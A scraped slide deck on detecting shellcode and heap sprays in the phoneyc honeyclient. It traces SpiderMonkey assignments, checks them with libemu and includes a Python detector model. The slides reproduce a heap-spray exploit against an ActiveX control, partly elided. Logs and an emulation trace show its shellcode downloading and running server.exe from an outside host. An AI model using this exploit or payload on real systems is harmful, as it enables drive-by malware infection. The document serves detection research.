phoneyc with libemu
Shellcode and heapspray detection in phoneyc

Zhijie Chen
Honeynet Project Chinese Chapter
Honeynet Project on Google Summer of Code, 2009
Contents

1  Introduction to phoneyc
2  A Typical Web-Based Malware
3  Shellcode detection using Libemu
4  Tracing Mozilla Spidermonkey
   Basic Principles of Spidermonkey
5  Shellcode Detection in phoneyc
   Basic Idea
   Details
   Related Source files
   Implementation
6  Heapspray Detection
7  Current Results
Introduction to phoneyc

http://code.google.com/p/phoneyc/

- A Python honeyclient
- Originally written by Jose Nazario
- Detects web-based malware
A Typical Heapspray Mal-javascript

    <body>
    <script>window.onerror=function(){return true;}</script>
    <object classid="clsid:7F5E27CE-4A5C-11D3-9232-0000B48A05B2"
    style='display:none' id='target'></object>
    <SCRIPT language="javascript">
    var shellcode = unescape("%u9090"+"%u9090"+
    ...(shellcode)
    "%u7468%u7074%u2f3a%u312f%u3176%u6e2e%u6d61%u2f65%u6573%u7672%u7265%u652e%u6578%u0000");
    </script>
    <SCRIPT language="javascript">
    var bigblock = unescape("%u9090%u9090");
    var headersize = 20;
    var slackspace = headersize+shellcode.length;
    while (bigblock.length<slackspace) bigblock+=bigblock;
    fillblock = bigblock.substring(0, slackspace);
    block = bigblock.substring(0, bigblock.length-slackspace);
    while(block.length+slackspace<0x40000)
      block = block+block+fillblock;
    memory = new Array();
    for (x=0; x<100; x++) memory[x] = block +shellcode;
    var buffer = '';
    while (buffer.length < 1024) buffer+="\x05";
    var ok="1111";
    target.Register(ok,buffer);
    </script>
    </body>
Heap Status After Heapspray

    | More than ??MB of 0x90 (NOP)s or some other x86 instructions as a sledge | Shellcode |
Detecting Shellcode/Heapspray

SC/HS Detecting Tool: How To Detect It?
Introduction to libemu

From its official site:

    libemu is a small library written in c offering basic x86 emulation and shellcode detection using GetPC heuristics.

Using libemu one can:
- detect shellcodes
- execute the shellcodes
- profile shellcode behaviour

Using libemu to detect shellcode and heapspray in web-based malware: see "Defending browsers against drive-by downloads: Mitigating heap-spraying code injection attacks".
Detecting x86 Instructions

SC/HS Detecting Time: When To Detect It?
Introduction to spidermonkey

What is SpiderMonkey?

SpiderMonkey is the code-name for Mozilla's C implementation of JavaScript. (http://www.mozilla.org/js/spidermonkey/)
Basic Principles of Spidermonkey

- All the JavaScript sources are compiled into JS bytecodes.
- There is an interpreter that interprets the bytecodes and performs certain simple actions.
- All the JavaScript variables are stored as jsval.
- Some of the values are stored as an "atom", such as strings.
Basic Idea

Both the shellcode manipulation and the spraying of the fillblock involve assignments. So the shellcode will be detected immediately on its assignment if we are able to interrupt spidermonkey at the interpretation of the bytecodes related to an assignment and check their arguments and values for shellcode.
Details I

The following JS code:

    function a(){b="c"; var a = 0;}

is compiled into bytecodes like:

    00000:   bindname "b"
    00003:   string "c"
    00006:   setname "b"
    00009:   pop
    00010:   zero
    00011:   setvar 0
    00014:   pop
    00015:   stop

So, if we examine the set* opcodes' arguments on the top of the stack at runtime, shellcodes won't get past!
Details

To do so, we need to:

- Step-trace the spidermonkey runtime.
- Stop at the key bytecodes (such as setname, setvar, setprop, setarg etc.) on all kinds of assignments. Unfortunately, different assignments have different bytecodes accordingly. But all the opcodes related to assignments share a JOF_SET bit in their opcode description structure (./src/jsopcode.h).
Related Source files to be used later

- jsapi.h: Basic APIs for JavaScript execution.
- jsdbgapi.h: Basic APIs for debugging spidermonkey.
- jsopcode.tbl: All the JS opcodes (bytecodes).
- jsinterp.c: You can find how each bytecode is interpreted here.
Implementation

- Register a trace handler into spidermonkey using JS_SetInterrupt. This handler will be called at each step of the bytecode execution.
- In the handler:
  - Use JS_GetTrapOpcode to get the current opcode (bytecode).
  - Use JS_FrameIterator to get the current runtime stack.
  - Check the rvalue of the set* bytecodes on the top of the stack with libemu.
  - Dump the shellcode and alert.
  - Continue the execution.
- Provide this traced JS virtual machine as a Python module named honeyjs, so other parts of phoneyc can use this module just the same as python-spidermonkey, with optional awareness of the extra shellcode/heapspray detection APIs.
Basic Idea

Heapspray:
- A myriad of NOP-like x86 instructions
- Accumulating through a loop of assignments
- Shellcode at the end of each sledge

Detection:
- Now: a variable counter to record the mal-assignments (assignments containing shellcode in the r-value).
- In the future: entropy? The Nozzle way?
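A Python model of the detector described on the Implementation and Heapspray Detection slides, added here as an example (not phoneyc's or honeyjs's code): it replays a constructed bytecode trace through an interrupt handler, inspects only JOF_SET opcodes, converts the rvalue to the bytes SpiderMonkey holds in memory, and counts mal-assignments per value. The shellcode check is a byte-pattern stand-in for libemu's GetPC emulation; the opcode set, the thresholds, the stub shellcode and the trace are all assumptions.

```python
import hashlib
import re
from dataclasses import dataclass, field
from typing import Callable, Dict, List, Optional

# Opcodes carrying the JOF_SET bit in jsopcode.tbl. The slides name setname, setvar,
# setprop, setarg "etc."; setelem (memory[x] = ...) is assumed to belong here too.
JOF_SET_OPCODES = {"setname", "setvar", "setprop", "setarg", "setelem"}

MIN_SLED = 64         # assumption: shortest run of 0x90 treated as a sledge
MIN_PAYLOAD = 16      # assumption: bytes that must follow the sledge
HEAPSPRAY_HITS = 10   # assumption: mal-assignments of one value before calling it a spray

def js_unescape(s: str) -> str:
    """JavaScript unescape(): %uXXXX is one UTF-16 code unit, %XX one 8-bit character."""
    return re.sub(r"%u([0-9A-Fa-f]{4})|%([0-9A-Fa-f]{2})",
                  lambda m: chr(int(m.group(1) or m.group(2), 16)), s)

def jsstring_bytes(s: str) -> bytes:
    """Bytes of a JS string as SpiderMonkey keeps it: 16-bit code units, little-endian.
    This is why %u9090 becomes two 0x90 NOPs and %u7468%u7074 becomes "http"."""
    return s.encode("utf-16-le", "surrogatepass")

# GetPC idioms that libemu's heuristics find by emulation; matched here as raw bytes.
GETPC_PATTERNS = (
    re.compile(rb"\xe8\x00\x00\x00\x00[\x58-\x5f]"),  # call $+5 ; pop reg
    re.compile(rb"\xd9\x74\x24\xf4"),                  # fnstenv [esp-0xc]
)

def check_shellcode(buf: bytes) -> Optional[dict]:
    """Stand-in for the libemu test run on a set* rvalue. Reports a long NOP sledge
    followed by a payload, or a GetPC idiom anywhere in the buffer, else None."""
    sled = re.search(rb"\x90{%d,}" % MIN_SLED, buf)
    if sled and len(buf) - sled.end() >= MIN_PAYLOAD:
        return {"kind": "sledge", "offset": sled.end(), "payload": buf[sled.end():]}
    for pat in GETPC_PATTERNS:
        hit = pat.search(buf)
        if hit:
            return {"kind": "getpc", "offset": hit.start(), "payload": buf[hit.start():]}
    return None

@dataclass
class TraceEvent:
    """One bytecode step as seen by a JS_SetInterrupt handler (constructed model)."""
    pc: int
    opcode: str
    rvalue: object = None  # top of stack when a set* opcode is about to run

@dataclass
class ShellcodeTracer:
    check: Callable[[bytes], Optional[dict]] = check_shellcode
    hits: Dict[str, int] = field(default_factory=dict)   # rvalue digest -> mal-assignments
    alerts: List[str] = field(default_factory=list)

    def on_step(self, ev: TraceEvent) -> bool:
        """Interrupt handler: called on every bytecode, inspects only JOF_SET opcodes
        whose rvalue is a string. Returns True so execution continues."""
        if ev.opcode not in JOF_SET_OPCODES or not isinstance(ev.rvalue, str):
            return True
        buf = jsstring_bytes(ev.rvalue)
        found = self.check(buf)
        if found:
            # phoneyc keys hits by the string's address; a digest of the value stands in here.
            key = hashlib.sha256(buf).hexdigest()[:12]
            self.hits[key] = self.hits.get(key, 0) + 1
            self.alerts.append(f"DEBUG: !!!SC DETECTED at pc {ev.pc:05d} ({ev.opcode}) "
                               f"{found['kind']} size:{len(found['payload'])}")
        return True

    def report(self) -> List[str]:
        """Per-value summary in the shape of phoneyc's [ALERT] lines."""
        out = []
        for key, n in self.hits.items():
            what = ("Shellcode & Potential heapspray sledge" if n >= HEAPSPRAY_HITS
                    else "Shellcode Detected")
            out.append(f"[ALERT] {key} -> {what} HIT: {n}")
        return out

def run_sample() -> ShellcodeTracer:
    """Replays a constructed trace modelled on the slides' sample: one assignment of the
    shellcode string, then 100 assignments of sledge + shellcode in the spray loop."""
    # Constructed stand-in shellcode: 4 NOPs, a call/pop GetPC stub (e8 00 00 00 00 58)
    # and the URL tail quoted on the slides, which decodes to "http://1v1.name/server.exe".
    sc = js_unescape("%u9090%u9090%u00e8%u0000%u5800"
                     "%u7468%u7074%u2f3a%u312f%u3176%u6e2e%u6d61"
                     "%u2f65%u6573%u7672%u7265%u652e%u6578%u0000")
    block = js_unescape("%u9090" * 512)  # constructed: 1024 NOP bytes instead of 0x40000
    trace = [TraceEvent(0, "string", sc), TraceEvent(3, "setname", sc), TraceEvent(6, "pop")]
    pc = 7
    for _ in range(100):  # for (x=0; x<100; x++) memory[x] = block + shellcode;
        trace.append(TraceEvent(pc, "setelem", block + sc))
        pc += 3
    tracer = ShellcodeTracer()
    for ev in trace:
        tracer.on_step(ev)
    return tracer
```

Running `run_sample().report()` yields one "Shellcode Detected HIT: 1" line for the shellcode variable and one "Potential heapspray sledge HIT: 100" line for the sprayed blocks, mirroring the [ALERT] lines on the results slide.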
A Run on ssreader_0day.html

    joyan@Jdeb:~/code/phoneyc$ sh go.sh
    HONEYCLIENT MODULE TEST
    fetching http://172.31.25.227/phoneyc/ssreader_0day.html
    []
    ==> http://172.31.25.227/phoneyc/ssreader_0day.html
    JS EVAL
    Executing Javascript:
    DEBUG: !!!SC DETECTED at 141847268=141847572size:374
    DEBUG: !!!SC DETECTED at 141847524=141847756size:32728
    DEBUG: !!!SC DETECTED at 141723488=141847756size:32728
    DEBUG: !!!SC DETECTED at 141723488=141847756size:32728
    ...
    DEBUG: !!!SC DETECTED at 141723488=141847756size:32728
    SSReader Pdg2 Register method overflow
    [ALERT] 0: 141847268 -> Shellcode Detected HIT: 1
    Runing shellcode... offset:248
    DEBUG: Begin analyzing ...
    DEBUG: download http://1v1.name/server.exe -> c:\WINDOWS\system32\a.exe
    ...
    URLs:['http://1v1.name/server.exe', 'http://1v1.name/server.exe']
    Done
    [ALERT] 0: 141847524 -> Shellcode Detected HIT: 1
    [ALERT] 0: 141723488 -> Shellcode & Potential heapspray sledge HIT: 100
    VBS EVAL IFRAMES []
    HREFS []
    FRAMES []
    IMAGES []
Analysis of The Shellcode using libemu

    FARPROC WINAPI GetProcAddress (
         HMODULE hModule = 0x7c800000 =>
              none;
         LPCSTR lpProcName = 0x0041710c =>
              = "GetSystemDirectoryA";
    ) = 0x7c814eea;
    FARPROC WINAPI GetProcAddress (
         HMODULE hModule = 0x7c800000 =>
              none;
         LPCSTR lpProcName = 0x00417120 =>
              = "WinExec";
    ) = 0x7c86136d;
    FARPROC WINAPI GetProcAddress (
         HMODULE hModule = 0x7c800000 =>
              none;
         LPCSTR lpProcName = 0x00417128 =>
              = "ExitThread";
    ) = 0x7c80c058;
    FARPROC WINAPI GetProcAddress (
         HMODULE hModule = 0x7c800000 =>
              none;
         LPCSTR lpProcName = 0x00417133 =>
              = "LoadLibraryA";
    ) = 0x7c801d77;
    HMODULE LoadLibraryA (
         LPCTSTR lpFileName = 0x00417140 =>
              = "urlmon";
    ) = 0x7df20000;
    FARPROC WINAPI GetProcAddress (
         HMODULE hModule = 0x7df20000 =>
              none;
         LPCSTR lpProcName = 0x00417147 =>
              = "URLDownloadToFileA";
    ) = 0x7df7b0bb;
    UINT GetSystemDirectory (
         LPTSTR lpBuffer = 0x0012fe5f =>
              none;
         UINT uSize = 32;
    ) = 19;
    HRESULT URLDownloadToFile (
         LPUNKNOWN pCaller = 0x00000000 =>
              none;
         LPCTSTR szURL = 0x0041715a =>
              = "http://1v1.name/server.exe";
         LPCTSTR szFileName = 0x0012fe5f =>
              = "c:\WINDOWS\system32\a.exe";
         DWORD dwReserved = 0;
         LPBINDSTATUSCALLBACK lpfnCB = 0;
    ) = 0;
    UINT WINAPI WinExec (
         LPCSTR lpCmdLine = 0x0012fe58 =>
              = "cmd /c c:\WINDOWS\system32\a.exe";
         UINT uCmdShow = 0;
    ) = 32;
Thank you!

Fuzzing | Null OWASP Mumbai | 2016 June
 
Advanced exploit development
Advanced exploit developmentAdvanced exploit development
Advanced exploit development
 
The State of the Veil Framework
The State of the Veil FrameworkThe State of the Veil Framework
The State of the Veil Framework
 
CNIT 127 Ch 3: Shellcode
CNIT 127 Ch 3: ShellcodeCNIT 127 Ch 3: Shellcode
CNIT 127 Ch 3: Shellcode
 

Similar to Shellcode and heapspray detection in phoneyc

Detecting Web Browser Heap Corruption Attacks - Stephan Chenette, Moti Joseph...
Detecting Web Browser Heap Corruption Attacks - Stephan Chenette, Moti Joseph...Detecting Web Browser Heap Corruption Attacks - Stephan Chenette, Moti Joseph...
Detecting Web Browser Heap Corruption Attacks - Stephan Chenette, Moti Joseph...Stephan Chenette
 
EkoParty 2010: iPhone Rootkit? There's an App for that.
EkoParty 2010: iPhone Rootkit? There's an App for that.EkoParty 2010: iPhone Rootkit? There's an App for that.
EkoParty 2010: iPhone Rootkit? There's an App for that.Eric Monti
 
Toorcon Seattle 2011 - Browser Exploit Packs
Toorcon Seattle 2011 - Browser Exploit PacksToorcon Seattle 2011 - Browser Exploit Packs
Toorcon Seattle 2011 - Browser Exploit PacksAditya K Sood
 
Flash security past_present_future_final_en
Flash security past_present_future_final_enFlash security past_present_future_final_en
Flash security past_present_future_final_enSunghun Kim
 
Dmitriy evdokimov. light and dark side of code instrumentation
Dmitriy evdokimov. light and dark side of code instrumentationDmitriy evdokimov. light and dark side of code instrumentation
Dmitriy evdokimov. light and dark side of code instrumentationYury Chemerkin
 
How to find Zero day vulnerabilities
How to find Zero day vulnerabilitiesHow to find Zero day vulnerabilities
How to find Zero day vulnerabilitiesMohammed A. Imran
 

Similar to Shellcode and heapspray detection in phoneyc (6)

Detecting Web Browser Heap Corruption Attacks - Stephan Chenette, Moti Joseph...
Detecting Web Browser Heap Corruption Attacks - Stephan Chenette, Moti Joseph...Detecting Web Browser Heap Corruption Attacks - Stephan Chenette, Moti Joseph...
Detecting Web Browser Heap Corruption Attacks - Stephan Chenette, Moti Joseph...
 
EkoParty 2010: iPhone Rootkit? There's an App for that.
EkoParty 2010: iPhone Rootkit? There's an App for that.EkoParty 2010: iPhone Rootkit? There's an App for that.
EkoParty 2010: iPhone Rootkit? There's an App for that.
 
Toorcon Seattle 2011 - Browser Exploit Packs
Toorcon Seattle 2011 - Browser Exploit PacksToorcon Seattle 2011 - Browser Exploit Packs
Toorcon Seattle 2011 - Browser Exploit Packs
 
Flash security past_present_future_final_en
Flash security past_present_future_final_enFlash security past_present_future_final_en
Flash security past_present_future_final_en
 
Dmitriy evdokimov. light and dark side of code instrumentation
Dmitriy evdokimov. light and dark side of code instrumentationDmitriy evdokimov. light and dark side of code instrumentation
Dmitriy evdokimov. light and dark side of code instrumentation
 
How to find Zero day vulnerabilities
How to find Zero day vulnerabilitiesHow to find Zero day vulnerabilities
How to find Zero day vulnerabilities
 

Recently uploaded

Are Multi-Cloud and Serverless Good or Bad?
Are Multi-Cloud and Serverless Good or Bad?Are Multi-Cloud and Serverless Good or Bad?
Are Multi-Cloud and Serverless Good or Bad?Mattias Andersson
 
"Subclassing and Composition – A Pythonic Tour of Trade-Offs", Hynek Schlawack
"Subclassing and Composition – A Pythonic Tour of Trade-Offs", Hynek Schlawack"Subclassing and Composition – A Pythonic Tour of Trade-Offs", Hynek Schlawack
"Subclassing and Composition – A Pythonic Tour of Trade-Offs", Hynek SchlawackFwdays
 
Take control of your SAP testing with UiPath Test Suite
Take control of your SAP testing with UiPath Test SuiteTake control of your SAP testing with UiPath Test Suite
Take control of your SAP testing with UiPath Test SuiteDianaGray10
 
Story boards and shot lists for my a level piece
Story boards and shot lists for my a level pieceStory boards and shot lists for my a level piece
Story boards and shot lists for my a level piececharlottematthew16
 
Dev Dives: Streamline document processing with UiPath Studio Web
Dev Dives: Streamline document processing with UiPath Studio WebDev Dives: Streamline document processing with UiPath Studio Web
Dev Dives: Streamline document processing with UiPath Studio WebUiPathCommunity
 
Connect Wave/ connectwave Pitch Deck Presentation
Connect Wave/ connectwave Pitch Deck PresentationConnect Wave/ connectwave Pitch Deck Presentation
Connect Wave/ connectwave Pitch Deck PresentationSlibray Presentation
 
Streamlining Python Development: A Guide to a Modern Project Setup
Streamlining Python Development: A Guide to a Modern Project SetupStreamlining Python Development: A Guide to a Modern Project Setup
Streamlining Python Development: A Guide to a Modern Project SetupFlorian Wilhelm
 
The Ultimate Guide to Choosing WordPress Pros and Cons
The Ultimate Guide to Choosing WordPress Pros and ConsThe Ultimate Guide to Choosing WordPress Pros and Cons
The Ultimate Guide to Choosing WordPress Pros and ConsPixlogix Infotech
 
Anypoint Exchange: It’s Not Just a Repo!
Anypoint Exchange: It’s Not Just a Repo!Anypoint Exchange: It’s Not Just a Repo!
Anypoint Exchange: It’s Not Just a Repo!Manik S Magar
 
Search Engine Optimization SEO PDF for 2024.pdf
Search Engine Optimization SEO PDF for 2024.pdfSearch Engine Optimization SEO PDF for 2024.pdf
Search Engine Optimization SEO PDF for 2024.pdfRankYa
 
WordPress Websites for Engineers: Elevate Your Brand
WordPress Websites for Engineers: Elevate Your BrandWordPress Websites for Engineers: Elevate Your Brand
WordPress Websites for Engineers: Elevate Your Brandgvaughan
 
Developer Data Modeling Mistakes: From Postgres to NoSQL
Developer Data Modeling Mistakes: From Postgres to NoSQLDeveloper Data Modeling Mistakes: From Postgres to NoSQL
Developer Data Modeling Mistakes: From Postgres to NoSQLScyllaDB
 
"Debugging python applications inside k8s environment", Andrii Soldatenko
"Debugging python applications inside k8s environment", Andrii Soldatenko"Debugging python applications inside k8s environment", Andrii Soldatenko
"Debugging python applications inside k8s environment", Andrii SoldatenkoFwdays
 
What's New in Teams Calling, Meetings and Devices March 2024
What's New in Teams Calling, Meetings and Devices March 2024What's New in Teams Calling, Meetings and Devices March 2024
What's New in Teams Calling, Meetings and Devices March 2024Stephanie Beckett
 
DSPy a system for AI to Write Prompts and Do Fine Tuning
DSPy a system for AI to Write Prompts and Do Fine TuningDSPy a system for AI to Write Prompts and Do Fine Tuning
DSPy a system for AI to Write Prompts and Do Fine TuningLars Bell
 
DevoxxFR 2024 Reproducible Builds with Apache Maven
DevoxxFR 2024 Reproducible Builds with Apache MavenDevoxxFR 2024 Reproducible Builds with Apache Maven
DevoxxFR 2024 Reproducible Builds with Apache MavenHervé Boutemy
 
Advanced Test Driven-Development @ php[tek] 2024
Advanced Test Driven-Development @ php[tek] 2024Advanced Test Driven-Development @ php[tek] 2024
Advanced Test Driven-Development @ php[tek] 2024Scott Keck-Warren
 
Gen AI in Business - Global Trends Report 2024.pdf
Gen AI in Business - Global Trends Report 2024.pdfGen AI in Business - Global Trends Report 2024.pdf
Gen AI in Business - Global Trends Report 2024.pdfAddepto
 
New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024
New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024
New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024BookNet Canada
 

Recently uploaded (20)

Are Multi-Cloud and Serverless Good or Bad?
Are Multi-Cloud and Serverless Good or Bad?Are Multi-Cloud and Serverless Good or Bad?
Are Multi-Cloud and Serverless Good or Bad?
 
"Subclassing and Composition – A Pythonic Tour of Trade-Offs", Hynek Schlawack
"Subclassing and Composition – A Pythonic Tour of Trade-Offs", Hynek Schlawack"Subclassing and Composition – A Pythonic Tour of Trade-Offs", Hynek Schlawack
"Subclassing and Composition – A Pythonic Tour of Trade-Offs", Hynek Schlawack
 
Take control of your SAP testing with UiPath Test Suite
Take control of your SAP testing with UiPath Test SuiteTake control of your SAP testing with UiPath Test Suite
Take control of your SAP testing with UiPath Test Suite
 
Story boards and shot lists for my a level piece
Story boards and shot lists for my a level pieceStory boards and shot lists for my a level piece
Story boards and shot lists for my a level piece
 
Dev Dives: Streamline document processing with UiPath Studio Web
Dev Dives: Streamline document processing with UiPath Studio WebDev Dives: Streamline document processing with UiPath Studio Web
Dev Dives: Streamline document processing with UiPath Studio Web
 
Connect Wave/ connectwave Pitch Deck Presentation
Connect Wave/ connectwave Pitch Deck PresentationConnect Wave/ connectwave Pitch Deck Presentation
Connect Wave/ connectwave Pitch Deck Presentation
 
Streamlining Python Development: A Guide to a Modern Project Setup
Streamlining Python Development: A Guide to a Modern Project SetupStreamlining Python Development: A Guide to a Modern Project Setup
Streamlining Python Development: A Guide to a Modern Project Setup
 
The Ultimate Guide to Choosing WordPress Pros and Cons
The Ultimate Guide to Choosing WordPress Pros and ConsThe Ultimate Guide to Choosing WordPress Pros and Cons
The Ultimate Guide to Choosing WordPress Pros and Cons
 
E-Vehicle_Hacking_by_Parul Sharma_null_owasp.pptx
E-Vehicle_Hacking_by_Parul Sharma_null_owasp.pptxE-Vehicle_Hacking_by_Parul Sharma_null_owasp.pptx
E-Vehicle_Hacking_by_Parul Sharma_null_owasp.pptx
 
Anypoint Exchange: It’s Not Just a Repo!
Anypoint Exchange: It’s Not Just a Repo!Anypoint Exchange: It’s Not Just a Repo!
Anypoint Exchange: It’s Not Just a Repo!
 
Search Engine Optimization SEO PDF for 2024.pdf
Search Engine Optimization SEO PDF for 2024.pdfSearch Engine Optimization SEO PDF for 2024.pdf
Search Engine Optimization SEO PDF for 2024.pdf
 
WordPress Websites for Engineers: Elevate Your Brand
WordPress Websites for Engineers: Elevate Your BrandWordPress Websites for Engineers: Elevate Your Brand
WordPress Websites for Engineers: Elevate Your Brand
 
Developer Data Modeling Mistakes: From Postgres to NoSQL
Developer Data Modeling Mistakes: From Postgres to NoSQLDeveloper Data Modeling Mistakes: From Postgres to NoSQL
Developer Data Modeling Mistakes: From Postgres to NoSQL
 
"Debugging python applications inside k8s environment", Andrii Soldatenko
"Debugging python applications inside k8s environment", Andrii Soldatenko"Debugging python applications inside k8s environment", Andrii Soldatenko
"Debugging python applications inside k8s environment", Andrii Soldatenko
 
What's New in Teams Calling, Meetings and Devices March 2024
What's New in Teams Calling, Meetings and Devices March 2024What's New in Teams Calling, Meetings and Devices March 2024
What's New in Teams Calling, Meetings and Devices March 2024
 
DSPy a system for AI to Write Prompts and Do Fine Tuning
DSPy a system for AI to Write Prompts and Do Fine TuningDSPy a system for AI to Write Prompts and Do Fine Tuning
DSPy a system for AI to Write Prompts and Do Fine Tuning
 
DevoxxFR 2024 Reproducible Builds with Apache Maven
DevoxxFR 2024 Reproducible Builds with Apache MavenDevoxxFR 2024 Reproducible Builds with Apache Maven
DevoxxFR 2024 Reproducible Builds with Apache Maven
 
Advanced Test Driven-Development @ php[tek] 2024
Advanced Test Driven-Development @ php[tek] 2024Advanced Test Driven-Development @ php[tek] 2024
Advanced Test Driven-Development @ php[tek] 2024
 
Gen AI in Business - Global Trends Report 2024.pdf
Gen AI in Business - Global Trends Report 2024.pdfGen AI in Business - Global Trends Report 2024.pdf
Gen AI in Business - Global Trends Report 2024.pdf
 
New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024
New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024
New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024
 

Shellcode and heapspray detection in phoneyc

  • 2. Contents
    1 Introduction to phoneyc
    2 A Typical Web-Based Malware
    3 Shellcode detection using Libemu
    4 Tracing Mozilla Spidermonkey
      Basic Principles of Spidermonkey
    5 Shellcode Detection in phoneyc
      Basic Idea
      Details
      Related Source files
      Implementation
    6 Heapspray Detection
    7 Current Results
  • 4. Introduction to phoneyc
    http://code.google.com/p/phoneyc/
    A python honeyclient, originally written by Jose Nazario, to detect Web-based malware.
  • 6. A Typical Heapspray Mal-javascript I
    <body>
    <script>window.onerror=function(){return true;}</script>
    <object classid="clsid:7F5E27CE-4A5C-11D3-9232-0000B48A05B2" style='display:none' id='target'></object>
    <SCRIPT language="javascript">
    var shellcode = unescape("%u9090"+"%u9090"+
    ...(shellcode)
    "%u7468%u7074%u2f3a%u312f%u3176%u6e2e%u6d61%u2f65%u6573%u7672%u7265%u652e%u6578%u0000");
    </script>
    <SCRIPT language="javascript">
    var bigblock = unescape("%u9090%u9090");
    var headersize = 20;
    var slackspace = headersize+shellcode.length;
    while (bigblock.length<slackspace) bigblock+=bigblock;
    fillblock = bigblock.substring(0, slackspace);
    block = bigblock.substring(0, bigblock.length-slackspace);
    while(block.length+slackspace<0x40000)
        block = block+block+fillblock;
  • 7. A Typical Heapspray Mal-javascript II
    memory = new Array();
    for (x=0; x<100; x++) memory[x] = block +shellcode;
    var buffer = '';
    while (buffer.length < 1024) buffer+="\x05";
    var ok="1111";
    target.Register(ok,buffer);
    </script>
    </body>
  • 8. Heap Status After Heapspray
    | More than ??MB of 0x90 (NOP)s or some other x86 instructions as a sledge | Shellcode |
  • 9. Detecting Shellcode/Heapspray
    SC/HS Detecting Tool: How To Detect It?
  • 11. Introduction to libemu
    From its official site: "libemu is a small library written in c offering basic x86 emulation and shellcode detection using GetPC heuristics."
    Using libemu one can:
      detect shellcodes
      execute the shellcodes
      profile shellcode behaviour
    Using libemu to detect shellcode and heapspray in web-based malware: "Defending browsers against drive-by downloads: Mitigating heap-spraying code injection attacks"
  • 12. Detecting x86 Instructions
    SC/HS Detecting Time: When To Detect It?
  • 14. Introduction to spidermonkey
    What is SpiderMonkey?
    SpiderMonkey is the code-name for Mozilla's C implementation of JavaScript. (http://www.mozilla.org/js/spidermonkey/)
  • 15. Basic Principles of Spidermonkey
    All the javascript sources are compiled into js bytecodes.
    There is an interpreter that interprets the bytecodes and performs certain simple actions.
    All the javascript variables are stored as jsval.
    Some of the values are stored as an "atom", such as strings.
  • 17. Basic Idea
    As both the shellcode manipulation and the spraying of the fillblock involve assignments, the shellcode will be detected immediately on its assignment if we are able to interrupt spidermonkey at the interpretation of the bytecodes related to an assignment and check their arguments and values for shellcodes.
  • 18. Details I
    The following js code:
    function a(){b="c"; var a = 0;}
    is compiled into bytecodes like:
    00000: bindname "b"
    00003: string "c"
    00006: setname "b"
    00009: pop
    00010: zero
    00011: setvar 0
    00014: pop
    00015: stop
    So, if we examine the set* opcodes' arguments on the top of the stack at runtime, shellcodes won't get past!
  • 19. Details
    To do so, we need to:
    Step trace the spidermonkey runtime.
    Stop at the key bytecodes (such as setname, setvar, setprop, setarg etc.) on all kinds of assignments. Unfortunately different assignments have different bytecodes accordingly.
    But all the opcodes related to assignments share a JOF_SET bit in their opcode description structure (./src/jsopcode.h).
  • 20. Related Source files to be used later
    jsapi.h: Basic APIs for javascript execution.
    jsdbgapi.h: Basic APIs for debugging spidermonkey.
    jsopcode.tbl: All the js opcodes (bytecodes).
    jsinterp.c: You can find how each bytecode is interpreted here.
  • 21. Implementation
    Register a trace handler into spidermonkey using JS_SetInterrupt. This handler will be called at each step of the bytecode execution.
    In the handler:
      Use JS_GetTrapOpcode to get the current opcode (bytecode).
      Use JS_FrameIterator to get the current runtime stack.
      Check the rvalue of the set* bytecodes on the top of the stack with libemu.
      Dump the shellcodes and alert.
      Continue the execution.
    Provide this traced js virtual machine as a python module named honeyjs, so other parts of phoneyc can use this module just the same as python-spidermonkey, with optional awareness of the extra shellcode/heapspray detection APIs.
  • 23. Basic Idea
    Heapspray
      A myriad of NOP-like x86 instructions
      Accumulating through a loop of assignments
      Shellcode in the end of each sledge
  • 24. Basic Idea
    Heapspray
      A myriad of NOP-like x86 instructions
      Accumulating through a loop of assignments
      Shellcode in the end of each sledge
    Detection
      Now: A variable counter to record the mal-assignments (assignments containing shellcode in the r-value).
      In the future: entropy? the nozzle way?
  • 26. A Run on ssreader 0day.html I
    joyan@Jdeb:~/code/phoneyc$ sh go.sh
    HONEYCLIENT MODULE TEST
    fetching http://172.31.25.227/phoneyc/ssreader 0day.html
    []
    ==> http://172.31.25.227/phoneyc/ssreader 0day.html
    JS EVAL
    Executing Javascript:
    DEBUG: !!!SC DETECTED at 141847268=141847572 size:374
    DEBUG: !!!SC DETECTED at 141847524=141847756 size:32728
    DEBUG: !!!SC DETECTED at 141723488=141847756 size:32728
    DEBUG: !!!SC DETECTED at 141723488=141847756 size:32728
    ...
    DEBUG: !!!SC DETECTED at 141723488=141847756 size:32728
    SSReader Pdg2 Register method overflow
    [ALERT] 0: 141847268 -> Shellcode Detected HIT: 1
    Runing shellcode... offset:248
    DEBUG: Begin analyzing ...
    DEBUG: download http://1v1.name/server.exe ->
  • 27. A Run on ssreader 0day.html II
    c:\WINDOWS\system32\a.exe
    ...
    URLs:['http://1v1.name/server.exe', 'http://1v1.name/server.exe']
    Done
    [ALERT] 0: 141847524 -> Shellcode Detected HIT: 1
    [ALERT] 0: 141723488 -> Shellcode & Potential heapspray sledge HIT: 100
    VBS EVAL
    IFRAMES []
    HREFS []
    FRAMES []
    IMAGES []
  • 28. Analysis of The Shellcode using libemu I
    FARPROC WINAPI GetProcAddress (
        HMODULE hModule = 0x7c800000 =>
            none;
        LPCSTR lpProcName = 0x0041710c =>
            = "GetSystemDirectoryA";
    ) = 0x7c814eea;
    FARPROC WINAPI GetProcAddress (
        HMODULE hModule = 0x7c800000 =>
            none;
        LPCSTR lpProcName = 0x00417120 =>
            = "WinExec";
    ) = 0x7c86136d;
    FARPROC WINAPI GetProcAddress (
        HMODULE hModule = 0x7c800000 =>
            none;
        LPCSTR lpProcName = 0x00417128 =>
            = "ExitThread";
    ) = 0x7c80c058;
    FARPROC WINAPI GetProcAddress (
        HMODULE hModule = 0x7c800000 =>
  • 29. Analysis of The Shellcode using libemu II
            none;
        LPCSTR lpProcName = 0x00417133 =>
            = "LoadLibraryA";
    ) = 0x7c801d77;
    HMODULE LoadLibraryA (
        LPCTSTR lpFileName = 0x00417140 =>
            = "urlmon";
    ) = 0x7df20000;
    FARPROC WINAPI GetProcAddress (
        HMODULE hModule = 0x7df20000 =>
            none;
        LPCSTR lpProcName = 0x00417147 =>
            = "URLDownloadToFileA";
    ) = 0x7df7b0bb;
